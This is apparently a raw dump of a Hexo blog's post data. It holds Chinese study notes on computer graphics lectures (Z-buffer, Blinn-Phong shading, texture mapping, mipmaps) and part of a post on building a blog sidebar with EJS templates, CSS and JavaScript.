
    Mipmap 的局限性

    png

    ​直接使用 Point sampling,不进行插值处理,远处会破。

    png

    ​我们假设拉满的(512x)的抗锯齿是正确答案。

    png

    ​插值完,由于 Mipmap 都是方形的,远处 Overblur 过于模糊。

    ​在标准的纹理映射中,每个像素都会在纹理上取样一个固定的方形区域,这可能导致在某些情况下出现失真或模糊。


    Anisotropic Filtering

    各向异性过滤

    png

    ​效果比 Mipmap 好使!

    png

    ​各向异性过滤,一种新的纹理映射算法。

    ​通过使用各向异性过滤(Anisotropic Filtering),可以根据像素与纹理之间的角度来动态调整采样区域的形状,以更好地适应纹理的拉伸和变形。这意味着在沿着纹理的方向上,采样区域可以被拉伸,而在垂直于纹理的方向上则可以被压缩,从而提供更准确的采样。

    png

    Ripmaps and summed area tables

    • Can look up axis-aligned rectangular zones
    • Diagonal footprints still a problem

    Ripmaps 和 Summed Area Tables(SATs)都是用于纹理映射的技术,旨在提高在不同分辨率下的纹理采样质量。

    1. Ripmaps:
      • Ripmaps 是一种用于在不同层次上存储纹理数据的结构。它将纹理分割成多个层次,每个层次的分辨率是前一个层次的一半。这种层次结构允许在不同分辨率下进行更有效的纹理采样。通过逐级插值,可以在不同分辨率的纹理之间平滑过渡,从而避免了突然的变化或失真。
    2. Summed Area Tables (SATs):
      • Summed Area Tables 是一种用于快速计算图像区域内像素之和的数据结构。它通过在每个像素位置存储从左上角到该位置的所有像素之和来实现。这使得可以通过查询四个角的和并进行相减来快速计算出任意矩形区域内像素的总和。SATs 在纹理映射中通常用于快速计算矩形区域内的纹理印记,以便更有效地进行纹理采样。

    EWA filtering

    ​EWA(Elliptical Weighted Average)滤波是一种用于纹理映射的高级采样技术,旨在提供更准确和更高质量的纹理采样结果。

    EWA 滤波通过考虑采样点周围的纹理像素,并根据它们与采样点之间的距离和方向来加权平均这些像素的值。与传统的线性或双线性插值相比,EWA 滤波考虑了更多的信息,因此在处理各种纹理形状和方向时能够产生更好的结果。

    主要特点包括:

    1. 椭圆权重:EWA 滤波使用椭圆形的加权函数来确定每个纹理像素对最终采样值的影响程度。这种权重考虑了采样点与纹理像素之间的距离和方向,使得在各向异性纹理和非均匀采样情况下能够产生更准确的结果。
    2. 自适应核大小:EWA 滤波通过自适应地调整椭圆核的大小和形状来适应不同的采样情况。这意味着它可以在不同分辨率和形状的纹理上产生更一致和更准确的采样结果。
    3. 抗锯齿和抗混叠:由于 EWA 滤波考虑了周围像素的权重和方向,因此它在处理锯齿状边缘和纹理混叠时能够产生更平滑和更真实的效果。
    • Use multiple lookups

      使用多个查找

    • Weighted average

      加权平均数

    • Mipmap hierarchy still helps

      Mipmap 层次结构仍然有帮助

    • Can handle irregular footprints

      可以处理不规则的足迹

    png


    ​效果越好,代价是性能越差。

    ]]>
    + 资源

    课程

    Lecture 7: Shading 1 (Illumination, Shading and Graphics Pipeline)

    • Visibility / occlusion 可见 / 遮挡

      • Z-buffering
    • Shading 阴影

      • Illumination & Shading 照明和阴影
      • Graphics Pipeline

    Visibility / occlusion

    ​对于由多个物体前后遮挡构成的场景,计算机该如何渲染图像?

    ​最简单的想法:画家算法 Painter’s Algorithm

    ​Inspired by how painters paint Paint from back to front, overwrite in the framebuffer.

    ​先画场景中远的面,再画近的面覆盖帧缓冲器。

    png

    ​Requires sorting in depth ($O(n\log n)$ for $n$ triangles)

    ​要对各种面的深度进行排序,因此这个算法的时间复杂度为 $O(n\log n)$。

    png

    ​Can have unresolvable depth order.

    ​这个算法有局限性,对上图这种互相重叠的三角形无解。


    Z-Buffer

    This is the algorithm that eventually won.

    这是最终采用的算法。

    Idea:

    • Store current min. z-value for each sample (pixel)

      对于每个像素,存储其 min. z-value

    • Needs an additional buffer for depth values

      需要一个额外的深度值缓冲区

      • frame buffer stores color values

        帧缓冲区存储颜色值

      • depth buffer (z-buffer) stores depth

        深度缓冲区(z-buffer)存储深度

    IMPORTANT: For simplicity we suppose $z$ is always positive (smaller $z$ -> closer, larger $z$ -> further)

    重要:为了简便计算,我们规定 $z$ 恒正,$z$ 越小越近,$z$ 越大越远。


    Z-Buffer Example

    png

    ​Z-Buffer 的示例,深度缓冲区存了一张深度图,深度图的灰度表示 $z$(越黑越近,越白越远)。


    Z-Buffer Algorithm

    将深度缓冲区初始化为 $\infty$
    During rasterization 光栅化过程中:

    1
    2
    3
    4
    5
    6
    7
    for (each triangle T)
    for (each sample (x,y,z) in T)
    if (z < zbuffer[x,y]) // closest sample so far 如果当前深度值比深度缓冲区里的还要小(这个三角形离摄像机更近)
    framebuffer[x,y] = rgb; // update color 更新帧缓冲区里的颜色
    zbuffer[x,y] = z; // update depth 更新深度缓冲区里的深度
    else
    ; // do nothing, this sample is occluded 这个三角形被遮挡了,不管它了

    png

    ​示例。一开始深度缓冲区里的深度值都是 $R$(无限)。先渲染红的,再渲染紫的。紫色的深度值如果比红的小,就覆盖掉。


    Z-Buffer Complexity

    Complexity

    • $O(n)$ for $n$ triangles (assuming constant coverage)

      时间复杂度 $O(n)$

    • How is it possible to sort $n$ triangles in linear time?

      怎么可能在线性时间内对 $n$ 个三角形排序?(空间换时间吧应该)

    Drawing triangles in different orders?

    用不同的顺序画三角形?

    • 深度值是浮点数,一般很难出现两个三角形中深度值相同的情况。因此不同的顺序画三角形的结果一般相同。如果两个三角形的深度值真的相同了,暂时也不考虑……

    Most important visibility algorithm

    最重要的可见性算法

    • Implemented in hardware for all GPUs

      在所有 GPU 的硬件中实现

    Shading

    What We’ve Covered So Far

    png

    ​在前面的课程中我们已经知道了计算机是怎么光栅化的。

    • Position objects and thecamera in the world

      在场景中放置物体和摄影机

    • Compute position of objectsrelative to the camera

      计算场景中物体与摄影机的相对位置

    • Project objects onto the screen

      将物体投影至屏幕上

    • Sample triangle coverage

      三角形采样覆盖(在屏幕上确定三角形的哪些像素需要被渲染的过程)


    Shading: Definition

    • In Merriam-Webster Dictionary

      在韦氏词典中

      shad·ing, [ˈʃeɪdɪŋ], noun

      The darkening or coloring of an illustration or diagram with parallel lines or a block of color.

      用平行线或色块使插图或图表变暗或上色。

    • In this course

      在本课程中

      The process of applying a material to an object.

      Shading 表示将材质应用到物体上的过程。


    A Simple Shading Model (Blinn-Phong Reflectance Model)

    一个简单的 Shading 模型——Blinn-Phong 模型。


    Perceptual Observations

    png

    ​感性地观察真实世界的情况,物体分为三个面:

    • Specular highlights

      高光面

    • Diffuse reflection

      漫反射面

    • Ambient lighting

      环境照明

      • 在现实世界中,我们看到物体有颜色是因为物体反射出对应颜色的光进入我们的人眼。

        如果一个物体不反射出光,则它将是一片黑。因此,如果只考虑直射的光,那么背光面将反射不出任何光,将会一片漆黑,这显然不现实。现实生活中背光面还会接收到其它面反射多次过来的光,不至于一片漆黑。

        而在计算机中,为了便于计算,就定义一个环境照明模拟其它面反射过来的光,使得背光面不至于一片漆黑。


    Shading is Local

    Compute light reflected toward camera at a specific shading point.

    计算在特定阴影点反射到相机的光。

    png

    Inputs 输入(均为单位向量):

    • Viewer direction 观察者向量, $\mathbf{v}$
    • Surface normal 表面法线向量, $\mathbf{n}$
    • Light direction 光照方向向量, (for each of many lights)
    • Surface parameters 表面参数 (color 颜色, shininess 亮度, …)

    png

    No shadows will be generated! (shading ≠ shadow)

    ​shading 和 shadow 是两码事,这个算法将不会产生任何阴影。


    Diffuse Reflection

    png

    • Light is scattered uniformly in all directions

      光在各个方向均匀地散射

      • Surface color is the same for all viewing directions

        对于所有观察方向,表面颜色是相同的

    png

    • But how much light (energy) is received?

      但是接收了多少光(能量)呢?

      • Lambert’s cosine law

        兰伯特余弦定律

    ​单位面积的表面接收到的光的能量与表面法线方向 $\mathbf n$ 与光的入射方向 $\mathbf l$ 的夹角 $\theta$ 有关。夹角越小,接受的光的能量越多,因此 $\cos \theta=\mathbf l \cdot \mathbf n$。


    Light Falloff

    png

    ​对于点光源,某个点接收到的光的强度与这个点到点光源的位置有关。

    ​假设点光源的能量为 $I$,且在传播中没有能量损失。

    ​那么如图所示,每个圈的能量综合为 $I$,那么这个点接收到的光的强度与这个点到点光源的距离 $r$ 的平方成反比,为 $I/r^2$。


    Lambertian (Diffuse) Shading

    png

    ​综上所述,我们得到了兰伯特漫反射光照模型:

    $$L_d=k_d(I/r^2)\max(0, \mathbf n\cdot\mathbf l)$$

    • $L_d$:diffusely reflected light

      漫反射光

    • $k_d$:diffuse coefficient (color)

      漫射系数(颜色)

    • $\max(0, \mathbf n\cdot\mathbf l)$:energy received by the shading point

      shading point 接收到的光的能量,$\max()$ 是为了防止光线从平面下方照射过来的情况

    ​Shading independent of view direction

    ​$L_d$ 与 $\mathbf n$ 和 $\mathbf v$ 之间的夹角无关,因此我们说 shading 独立于视图方向


    Produces diffuse appearance

    png

    ​最后的渲染结果,$k_d$ 越强,物体越亮。

    Lecture 8: Shading 2 (Shading, Pipeline and Texture Mapping)

    • Shading 2

      • Blinn-Phong reflectance model

        • Specular and ambient terms

          环境光和镜面反射

      • Shading frequencies

        着色频率

      • Graphics pipeline

        图形管线

      • Texture mapping

        纹理映射

      • Barycentric coordinates

        重心坐标

    Blinn-Phong reflectance model

    Specular Term (Blinn-Phong)

    镜面反射

    png

    Intensity depends on view direction

    镜面反射的强度取决于观察者的方向

    • Bright near mirror reflection direction

      在镜面反射中,光线反射的方向 $\mathbf R$ 与观察者的视线 $\mathbf v$ 非常接近,因此产生了明亮的反射效果


    $\mathbf v$ close to mirror direction $\Leftrightarrow$ half vector near normal

    在 Blinn-Phong 镜面反射模型中,

    将观察角度 $\mathbf v$ 与镜面反射角度之间的夹角的计算

    转换为

    光线入射角度 $\mathbf l$ 与观察角度 $\mathbf v$ 的半程向量(角平分线方向)$\mathbf h$ 与法线方向 $\mathbf n$ 的夹角。

    • Measure “near” by dot product of unit vectors

      用单位向量的点积来度量“近”

    png

    ​因此高光(镜面反射光的计算公式):

    $$L_s=k_s(I/r^2)\max(0,\mathbf n\cdot\mathbf h)^p$$

    ​其中 $k_s$ 为镜面反射系数。

    png

    ​为什么 $\max(0, \mathbf n\cdot \mathbf h)$ 后要加 $p$ 次方?这是为了调整高光面积。

    png

    ​$p$ 值越大,光斑越小。


    Ambient Term

    环境光照

    Shading that does not depend on anything
    不依赖任何东西的 Shading

    • Add constant color to account for disregarded illumination and fill in black shadows

      添加恒定的颜色,以说明忽略照明和填充黑色阴影

    • This is approximate / fake!

      这是近似的/假的!

    png

    $$L_a=k_aI_a$$

    ​环境光强度=环境系数 * 环境光强度


    Blinn-Phong Reflection Model

    png

    ​综上所述,我们得到了一个完整的 Blinn-Phong 反射模型:

    $$\begin{aligned}\text{L}&=L_a+L_d+L_s\&=k_aI_a+k_d(I/r2)\max(0,\mathbf{n}\cdot\mathbf{l})+k_s(I/r2)\max(0,\mathbf{n}\cdot\mathbf{h})^p\end{aligned}$$

    ​Blinn-Phong 反射 = Ambient 环境光照 + Diffuse 漫反射 + Specular 高光

    Shading frequencies

    Shading Frequencies

    渲染频率

    What caused the shading difference?

    png

    ​不同的渲染频率得到不同的渲染效果。


    Shade each triangle (flat shading)

    png

    Flat shading

    • Triangle face is flat——one normal vector

      对于一个模型来说,每个三角形具有一个法线向量,因此每个三角形看上去都是平的。

    • Not good for smooth surfaces

      对平滑物体效果不好。


    Shade each vertex (Gouraud shading)

    png

    Gouraud shading

    • Interpolate colors from vertices across triangle

      每个顶点都有一个颜色,平面的颜色由各个顶点之间的颜色插值得到。

    • Each vertex has a normal vector (how?)

      每个顶点具有一个法线向量


    Shade each pixel (Phong shading)

    png

    Phong shading

    • Interpolate normal vectors across each triangle

      法线向量会在三角形的表面上进行插值,以获得每个像素处的法线向量

    • Compute full shading model at each pixel

      对于每个像素,利用插值得到的法线向量和光照模型。

    • Not the Blinn-Phong Reflectance Model

      跟 Blinn-Phong 反射模型是一个人提出来的,但是这两个东西是两码事。


    Shading Frequency: Face, Vertex or Pixel

    png

    ​如果模型的面数足够多,那么 Flat Shading 和 Gouraud Shading 也可以得到类似 Phong Shading 的效果。


    Defining Per-Vertex Normal Vectors

    ​如何得到顶点法线?

    ​Best to get vertex normals from the underlying geometry

    ​最好的得到顶点法线向量的方法是从基础几何图形(矢量图形?)处得到。

    png

    • e.g. consider a sphere

      如上图所示,如果计算机知道这是一个球,那么就很好知道顶点法线向量。

    ​Otherwise have to infer vertex normals from triangle faces

    ​但是一般情况下计算机并不知道,只能从三角形面推断顶点法线向量。

    png

    • Simple scheme: average surrounding face normals

      简单方案:取周围面法线的平均值

    $$N_v=\frac{\sum_iN_i}{||\sum_iN_i||}$$


    Barycentric interpolation (introducing soon) of vertex normals

    ​顶点法线的重心插值(下节课再说)

    png

    ​Don’t forget to normalize the interpolated directions

    ​不要忘记对插值方向进行规范化

    Graphics pipeline

    Graphics (Real-time Rendering) Pipeline

    现在我们再来回顾一下实时场景渲染的管线。

    png

    渲染管线流程

    1. Vertex Processing

      处理顶点

    2. Triangle Processing

      处理三角形面

    3. Rasterization

      光栅化

    4. Fragment Processing

      处理片元(这个 Fragment 可以视为未经过抗锯齿等后处理的像素)

    5. Framebuffer Operations

      帧缓冲操作

    png

    Model, View, Projection transforms 属于 Vertex Processing,放置场景,得到 vertices in 3D space

    png

    Sampling triangle coverage 属于 Rasterization,将三维场景的顶点映射到二维屏幕上,得到 fragments

    png

    Z-Buffer Visibility Tests 属于 Fragment Processing,是计算最终 Fragment 颜色的一部分。

    png

    Shading 既可属于 Vertex Processing,也可属于 Fragment Processing

    ​Shader 中就分为顶点着色器 Vertex Shader 和片元着色器 Fragment Shader,应该就是这回事。

    png

    ​Texture mapping 既可属于 Vertex Processing,也可属于 Fragment Processing。给模型贴图。


    Shader Programs

    着色器程序

    • Program vertex and fragment processing stages

      既可属于 Vertex Processing,也可属于 Fragment Processing

    • Describe operation on a single vertex (or fragment)

      描述某个顶点或片元颜色的操作

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    uniform sampler2D myTexture; // program parameter 程序参数
    uniform vec3 lightDir; // program parameter 程序参数
    varying vec2 uv; // per fragment value (interp. by rasterizer) 每个片元特有的值
    varying vec3 norm; // per fragment value (interp. by rasterizer) 每个片元特有的值

    void diffuseShader()
    {
    vec3 kd; // 漫反射系数(颜色)
    kd = texture2d(myTexture, uv); // material color from texture 从 UV 贴图中获取材质颜色
    kd *= clamp(dot(–lightDir, norm), 0.0, 1.0); // Lambertian shading model,应用兰伯特漫反射光照模型,将 kd 乘以后面这东西得到 Ld(漫反射光)
    gl_FragColor = vec4(kd, 1.0); // output fragment color 输出片元颜色
    }

    Shader function executes once per fragment.

    Shader 函数对每个片元执行一次(因此不用像 C 语言那样遍历所有顶点,它自动帮你遍历好了)。

    • Outputs color of surface at the current fragment’s screen sample position.

      输出当前片段屏幕样本位置表面的颜色。

    • This shader performs a texture lookup to obtain the surface’s material color at this point, then performs a diffuse lighting calculation.

      这个着色器执行纹理查找以获得表面的材质颜色,然后执行漫反射照明计算。

    Snail (shadertoy.com) 这是一个很牛逼的 shader 渲染实例。


    Goal: Highly Complex 3D Scenes in Realtime

    目标:高复杂度的实时 3D 场景渲染

    • 100’ s of thousands to millions of triangles in a scene

      场景中有成千上万到数百万个三角形

    • Complex vertex and fragment shader computations

      复杂的顶点和片段着色计算

    • High resolution (2-4 megapixel + supersampling)

      高分辨率(2-4 百万像素+超采样)

    • 30-60 frames per second (even higher for VR)

      每秒 30-60 帧(VR 甚至更高)


    Graphics Pipeline Implementation: GPUs

    图形管道实现:gpu

    png

    ​Specialized processors for executing graphics pipeline computations

    ​图形管道流程需要大量并行运算,因此需要 GPU——用于执行图形管道计算的专用处理器。

    png

    ​GPU 的结构示意图。

    Texture mapping

    Texture Mapping

    Different Colors at Different Places?

    png

    ​对于兰伯特漫反射光照模型,其中的 $k_d$ 是怎么得来的?


    Surfaces are 2D

    表面都是 2D 的

    png

    Surface lives in 3D world space

    表面在 3D 空间中

    Every 3D surface point also has a place where it goes in the 2D image (texture).

    每个 3D 表面点在 2D 图像(纹理)中也有一个位置。


    Texture Applied to Surface

    Texture Applied to Surface

    png

    Each triangle “copies” a piece of the texture image to the surface

    每个三角形将纹理图像的一部分“复制”到表面


    Visualization of Texture Coordinates

    png

    Each triangle vertex is assigned a texture coordinate $(u,v)$

    每个三角形顶点分配一个纹理坐标 $(u,v)$

    这么表示 UV 贴图的情况,越红 $u$ 值越高,越绿 $v$ 值越高。


    Texture Applied to Surface

    png

    ​这个 UV 贴图是从美术人员那边获得的,咱们程序员不管这个!


    Textures applied to surfaces

    png

    ​一个贴图示例。


    Visualization of texture coordinates

    png

    ​这个模型由若干 UV 贴图平铺而成。


    Textures can be used multiple times!

    png

    ​这就需要美工人员整一个无缝贴图了!

    Lecture 09 Shading 3 (Texture Mapping Cont.)

    • Shading 3

      • Barycentric coordinates

        重心坐标

      • Texture queries

        纹理查询

      • Applications of textures

        纹理的应用

    Barycentric coordinates

    Interpolation Across Triangles

    三角形内插

    Why do we want to interpolate?

    为什么要进行插值呢?

    • Specify values at vertices

      指定顶点的值

    • Obtain smoothly varying values across triangles

      获取平滑的三角形变换值

    What do we want to interpolate?

    我们想要对什么样的值进行插值运算?

    • Texture coordinates, colors, normal vectors, …

      纹理坐标,颜色,法向量,…

    How do we interpolate?

    我们该如何进行插值呢?

    • Barycentric coordinates

      重心坐标


    Barycentric Coordinates

    重心坐标

    png

    ​三角形的坐标系统:

    ​三角形 $\bigtriangleup_{ABC}$ 所在平面上的点可用三角形的顶点坐标的线性变换表示:$(x,y)=\alpha A+\beta B+\gamma C$,且 $\alpha+\beta+\gamma=1$

    ​额外的,Inside the triangle if all three coordinates are non-negative,如果这个点在三角形内,则 $\alpha,\beta,\gamma$ 均非负。

    png

    ​如果这个点恰好是 $A$ 点,则 $\alpha=1,\beta=0,\gamma=0$。


    png

    ​对于三角形内部的点,其重心坐标的 $\alpha,\beta,\gamma$ 由这个点与三角形顶点的连线再与原三角形所形成的三角形的面积所决定。

    $$\alpha=\frac{A_A}{A_A+A_B+A_C}\\beta=\frac{A_B}{A_A+A_B+A_C}\\gamma=\frac{A_C}{A_A+A_B+A_C}$$


    png

    ​如果这个点刚好是三角形的重心,则它的重心坐标为 $(\frac{1}{3},\frac{1}{3},\frac{1}{3})$。


    png

    ​$(x,y)$ 的重心坐标公式:

    $$\begin{aligned}&\alpha=\frac{-(x-x_B)(y_C-y_B)+(y-y_B)(x_C-x_B)}{-(x_A-x_B)(y_C-y_B)+(y_A-y_B)(x_C-x_B)}\&\beta=\frac{-(x-x_C)(y_A-y_C)+(y-y_C)(x_A-x_C)}{-(x_B-x_C)(y_A-y_C)+(y_B-y_C)(x_A-x_C)}\&\gamma=1-\alpha-\beta\end{aligned}$$


    Using Barycentric Coordinates

    使用重心坐标

    Linearly interpolate values at vertices

    在顶点处线性插值

    png

    ​这个用于插值计算的值 $V_A,V_B,V_C$ 可以是位置,纹理坐标,颜色,法线,深度,材料属性等,通过计算获取平滑的三角形变换值。

    ​However, barycentric coordinates are not invariant under projection!

    ​如果三角形作了投影变换,那么重心坐标会改变!所以这个操作应该在投影变换之前。

    Texture queries

    Simple Texture Mapping: Diffuse Color

    简单纹理映射:漫反射颜色

    1
    2
    3
    4
    for each rasterized screen sample (x, y):  # 对于每个栅格化屏幕样本(x, y),通常是像素中心
    (u, v) = evaluate texture coordinate at (x, y) # 在 (x, y) 计算纹理坐标 (u, v),Using barycentric coordinates!
    texcolor = texture.sample(u, v); # 从 (u, v) 出获取颜色
    set sample’s color to texcolor; # 设置样本的颜色为 texcolor,通常是漫射反照率 Kd,(回想一下 Blinn-Phong 反射模型)

    Texture Magnification - Easy Case

    纹理贴图太小了怎么办?

    Generally don’t want this — insufficient texture resolution

    一般不希望这样-纹理分辨率不足

    A pixel on a texture — a texel

    我们把纹理贴图上的一个像素称之为 texel(纹理元素、纹素)

    png

    ​三种处理方法:

    Nearest 取最邻近的 texel

    Bilinear 双线性插值

    Bicubic 双三次插值,一种利用待采样点周围 16 个点的灰度值作三次插值的复杂算法


    Bilinear Interpolation

    双线性插值

    png

    ​假设我们想要对红点处 $(x,y)$ 求出其纹理颜色值 $f(x,y)$。

    png

    ​考虑红点处周围 4 个点,插值两次,得到 $f(x,y)=\mathrm{lerp}(t,u_0,u_1)$。


    png

    ​Bilinear interpolation usually gives pretty good results at reasonable costs.

    ​双线性插值通常以合理的成本给出相当好的结果。


    Texture Magnification (hard case)

    如果纹理贴图太大了怎么办?

    png

    ​纹理贴图太大导致的后果——近处有 Jaggies 锯齿,远处有 Moire 摩尔纹,远处的频率太高了比采样的频率还高导致的。


    Screen Pixel “Footprint” in Texture

    纹理中的屏幕像素“足迹”

    png

    png

    ​近处的每个像素点包含的纹理贴图部分少,远处的每个像素点包含的纹理贴图部分多。


    Will Supersampling Do Antialiasing?

    如果使用抗锯齿进行超采样会怎么样?

    png

    ​好使,但是渲染成本太高!


    Antialiasing — Supersampling?

    抗锯齿——超采样?

    Will supersampling work?

    超采样有效吗?

    • Yes, high quality, but costly

      是的,高质量,但是成本高

    • When highly minified, many texels in pixel footprint

      当高度缩小时,在像素足迹中有许多纹理

    • Signal frequency too large in a pixel

      一个像素的信号频率太大

    • Need even higher sampling frequency

      需要更高的采样频率

    Let’ s understand this problem in another way

    让我们用另一种方式来理解这个问题

    • What if we don’t sample?

      如果我们不采样怎么办?

    • Just need to get the average value within a range!

      只需要得到一个范围内的平均值!


    Mipmap

    Allowing (fast, approx., square) range queries

    允许(快速,近似,正方形)的纹理查询

    png

    ​“Mip” comes from the Latin “multum in parvo”, meaning a multitude in a small space

    ​“Mip”来自拉丁语“multum in parvo”,意思是一个小空间里的许多人

    ​多耗费 $\frac{1}{3}$ 的存储空间存储 Mipmap。

    png

    ​多层 $D$ 的 Mip 金字塔。


    Computing Mipmap Level D

    png

    ​Estimate texture footprint using texture coordinates of neighboring screen samples

    ​使用相邻屏幕采样点的纹理坐标来估算纹理印记。

    png

    $$D=\log_2{L}$$

    $$L=\max\left(\sqrt{\left(\frac{du}{dx}\right)2+\left(\frac{dv}{dx}\right)2},\sqrt{\left(\frac{du}{dy}\right)2+\left(\frac{dv}{dy}\right)2}\right)$$

    ​所使用的 Mipmap 的 level $D$ 由像素的纹理坐标与周边像素的纹理坐标之间的距离决定。


    Visualization of Mipmap Level

    Mipmap 等级可视化

    png

    ​看上去一格一格的。


    Trilinear Interpolation

    三线性插值

    png

    ​因此要对 $D$ 和 $D+1$ 之间再做一个线性插值。


    Visualization of Mipmap Level

    Mipmap 等级可视化

    png

    ​插值后的 Mipmap level 看起来好极了!


    Mipmap Limitations

    Mipmap 的局限性

    png

    ​直接使用 Point sampling,不进行插值处理,远处会破。

    png

    ​我们假设拉满的(512x)的抗锯齿是正确答案。

    png

    ​插值完,由于 Mipmap 都是方形的,远处 Overblur 过于模糊。

    ​在标准的纹理映射中,每个像素都会在纹理上取样一个固定的方形区域,这可能导致在某些情况下出现失真或模糊。


    Anisotropic Filtering

    各向异性过滤

    png

    ​效果比 Mipmap 好使!

    png

    ​各向异性过滤,一种新的纹理映射算法。

    ​通过使用各向异性过滤(Anisotropic Filtering),可以根据像素与纹理之间的角度来动态调整采样区域的形状,以更好地适应纹理的拉伸和变形。这意味着在沿着纹理的方向上,采样区域可以被拉伸,而在垂直于纹理的方向上则可以被压缩,从而提供更准确的采样。

    png

    Ripmaps and summed area tables

    • Can look up axis-aligned rectangular zones
    • Diagonal footprints still a problem

    Ripmaps 和 Summed Area Tables(SATs)都是用于纹理映射的技术,旨在提高在不同分辨率下的纹理采样质量。

    1. Ripmaps:
      • Ripmaps 是一种用于在不同层次上存储纹理数据的结构。它将纹理分割成多个层次,每个层次的分辨率是前一个层次的一半。这种层次结构允许在不同分辨率下进行更有效的纹理采样。通过逐级插值,可以在不同分辨率的纹理之间平滑过渡,从而避免了突然的变化或失真。
    2. Summed Area Tables (SATs):
      • Summed Area Tables 是一种用于快速计算图像区域内像素之和的数据结构。它通过在每个像素位置存储从左上角到该位置的所有像素之和来实现。这使得可以通过查询四个角的和并进行相减来快速计算出任意矩形区域内像素的总和。SATs 在纹理映射中通常用于快速计算矩形区域内的纹理印记,以便更有效地进行纹理采样。

    EWA filtering

    ​EWA(Elliptical Weighted Average)滤波是一种用于纹理映射的高级采样技术,旨在提供更准确和更高质量的纹理采样结果。

    EWA 滤波通过考虑采样点周围的纹理像素,并根据它们与采样点之间的距离和方向来加权平均这些像素的值。与传统的线性或双线性插值相比,EWA 滤波考虑了更多的信息,因此在处理各种纹理形状和方向时能够产生更好的结果。

    主要特点包括:

    1. 椭圆权重:EWA 滤波使用椭圆形的加权函数来确定每个纹理像素对最终采样值的影响程度。这种权重考虑了采样点与纹理像素之间的距离和方向,使得在各向异性纹理和非均匀采样情况下能够产生更准确的结果。
    2. 自适应核大小:EWA 滤波通过自适应地调整椭圆核的大小和形状来适应不同的采样情况。这意味着它可以在不同分辨率和形状的纹理上产生更一致和更准确的采样结果。
    3. 抗锯齿和抗混叠:由于 EWA 滤波考虑了周围像素的权重和方向,因此它在处理锯齿状边缘和纹理混叠时能够产生更平滑和更真实的效果。
    • Use multiple lookups

      使用多个查找

    • Weighted average

      加权平均数

    • Mipmap hierarchy still helps

      Mipmap 层次结构仍然有帮助

    • Can handle irregular footprints

      可以处理不规则的足迹

    png


    ​效果越好,代价是性能越差。

    ]]>
    @@ -2303,7 +2303,7 @@ /posts/Hexo-%E4%BE%A7%E8%BE%B9%E6%A0%8F/ - 前言

    ​没错!我又开始瞎鼓捣我的博客了!本次更新了侧边栏功能!便于在正文旁边加点辅助信息,提升阅读体验。

    布局

    post_centent

    post_centent.ejs 的内容如下:

    <div class="post-content">
    <article class="post-content-info">
    <%- page.content %>
    <%- partial('widget/comments'); %>
    </article>
    <% if(page.aside != false) { %>
    <%- partial('_partial/post_aside'); %>
    <% } %>
    </div>

    ​一个 <div class="post-content"> 存储主体信息。

    • <article class="post-content-info"> 正文内容。
    • <%- partial('_partial/post_aside'); %> 侧边栏内容。
      • 如果文章头的参数 aside 设为 false,不创建侧边栏。

    ​当屏幕宽度大于 960px 时,.post-content 使用弹性布局,将侧边栏放在正文内容右边:

    display: flex;
    margin: -100px auto 95px;
    width: 100%;
    justify-content: center;

    ​当屏幕宽度下于 960px 时,将“侧边栏”放在正文内容下边(像 butterfly 那么做):

    flex-direction: column;

    post_aside

    post_aside.ejs 下的内容(简略):

    <div class="aside">
    <%- js('js/widget/aside.js'); %>
    <script>
    showAside();
    </script>

    <div class="aside-top">
    <div class="aside-top-about aside-card">
    ...
    </div>
    </div>

    <% if(page.series) { %>
    <div class="aside-top-series aside-card">
    ...
    </div>

    <div class="aside-bottom">
    <% if(page.toc) { %>
    ...
    <div class="aside-bottom-toc aside-card">
    ...
    </div>
    <% } %>
    </div>
    </div>

    <div class="aside"> 下有:

    • <div class="aside-top">,这个是相对布局:
    position: relative;
    z-index: 2;
    margin-left: 20px;
    width: min(260px, 20vw);
    • <div class="aside-bottom">,这个是 sticky 布局,主要是让视图滚动时也能显示目录。
    position: sticky;
    top: 80px;
    margin-left: 20px;
    width: min(260px, 20vw);

    aside-card

    width: calc(100% - 20px);
    border-radius: 10px;
    background: var(--background-primary);
    box-shadow: 0 1px 3px hsla(0, 0%, 7%, 0.1);
    padding: 10px;
    border: 1px solid rgba(18, 24, 58, 0.06);
    transition: background 0.3s ease-out;

    ​写一个侧边栏卡片样式。

    Series 标签

    ​我设计了一个新的文章属性:series!据我所知,这个功能还是我独创的。

    series: Hexo

    ​这个 series 的值必须在 tags 里存在,算是一个文章的系列标签,或是我学习一门重要技术时探索的时间线。

    <ol class="series">
    <% let serialNumber = 0; %>
    <% let seriesCount = 0; %>
    <% let find = false; %>
    <% site.posts.sort('date').forEach(function(post) { %>
    <% if (post.series === page.series) { %>
    <% seriesCount += 1; %>
    <% if (!find) {serialNumber += 1;} %>
    <% if (post.path === page.path) { %>
    <% find = true; %>
    <li class="series-item active">
    <a class="series-link active" href="/<%= post.path %>">
    &nbsp;&nbsp;<span class="text"><%= post.title %></span>
    </a>
    </li>
    <% } else { %>
    <li class="series-item">
    <a class="series-link" href="/<%= post.path %>">
    &nbsp;&nbsp;<span class="text"><%= post.title %></span>
    </a>
    </li>
    <% } %>
    <% } %>
    <% }); %>
    </ol>

    ​渲染时会查找所有跟 series 相同的文章并按时间顺序排列后放到侧边栏中,便于读者快速找到其它相关文章。

    自定义侧边栏

    ​现在文章通过 JS 可以自定义侧边栏!原理就是使用 JS 往 <div class="aside-top"><div class="aside-bottom"> 下面插入 <div class="aside-card">

    ​由于渲染顺序的关系,只能在文章属性的 inject.bottom 里设置相应的 JS 逻辑(这个功能是抄 butterfly 的)(虽然把逻辑放到前端会拖慢网页加载速度,但我觉得这么写不会显得那么屎山,而且就这么点代码问题也不大你说是不是)。

    inject:
    bottom:
    - <script type="text/javascript" src="test_aside.js"></script>
    function createNode_1() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("长安古意"));
    e_1.appendChild(e_2);
    var e_3 = document.createElement("span");
    e_3.appendChild(document.createTextNode("唐·卢照邻"));
    e_1.appendChild(e_3);
    e_0.appendChild(e_1);
    var e_4 = document.createElement("p");
    e_4.appendChild(document.createTextNode("\n长安大道连狭斜,"));
    var e_5 = document.createElement("br");
    e_4.appendChild(e_5);

    ...

    e_4.appendChild(document.createTextNode("飞来飞去袭人裾。"));
    var e_72 = document.createElement("br");
    e_4.appendChild(e_72);
    e_0.appendChild(e_4);
    return e_0;
    }

    function createNode_2() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
